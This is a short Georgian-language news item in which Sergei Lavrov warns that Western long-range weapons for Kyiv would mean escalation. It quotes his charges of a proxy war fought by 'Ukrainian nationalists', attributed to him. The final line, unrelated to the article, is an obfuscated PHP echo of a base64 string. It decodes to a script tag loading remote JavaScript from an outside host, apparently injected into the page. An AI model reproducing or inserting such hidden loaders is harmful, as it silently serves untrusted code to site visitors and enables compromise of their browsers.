celsiusi
ავერსი საქკაბელი
რუსეთის საგარეო საქმეთა მინისტრის, სერგეი ლავროვის განცხადებით, თუ დასავლეთი რუსეთის ტერიტორიაზე პოტენციური დარტყმისთვის, კიევისთვის დიდ რადიუსზე მოქმედი იარაღის მიწოდებას დაიწყებს, ეს იქნება ნაბიჯი ესკალაციისკენ.
 
რუსმა დიპლომატმა ევროპელ პოლიტიკოსებს მოუწოდა, აღკვეთონ ესკალაციის ახალი რაუნდი.
 
სერგეი ლავროვმა იმედი გამოთქვა, რომ საღად მოაზროვნე პოლიტიკოსები დასავლეთში, ჯერ კიდევ არიან, რომლებიც აცნობიერებენ ამ საფრთხეს.
 
"დასავლეთი გამოვიდა მოწოდებით, რომ რუსეთი დამარცხდეს ბრძოლის ველზე. ამისთვის კი საჭიროა, უკრაინელი ნაციონალისტების შეიარაღების გაგრძელება ისეთი იარაღით, რომელსაც შეუძლია, რუსეთის ფედერაციას მიაღწიოს. ასეთ იარაღს მოითხოვს საჯაროდ ზელენსკიც. ჩვენ გავაფრთხილეთ დასავლეთი, რომ ისინი აწარმოებენ მარიონეტულ ომს რუსეთის წინააღმდეგ, რაც ხდება უკრაინელი ნაციონალისტების ხელით, მაგრამ ეს იქნება მიუღებელი, ესკალაციისკენ გადადგმული ნაბიჯი. იმედი მაქვს, საღი აზრის მქონე ადამიანები დასავლეთში, რომლებიც იქ ცოტა დარჩნენ, ამას მიხვდებიან", - განაცხადა ლავროვმა.
593
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");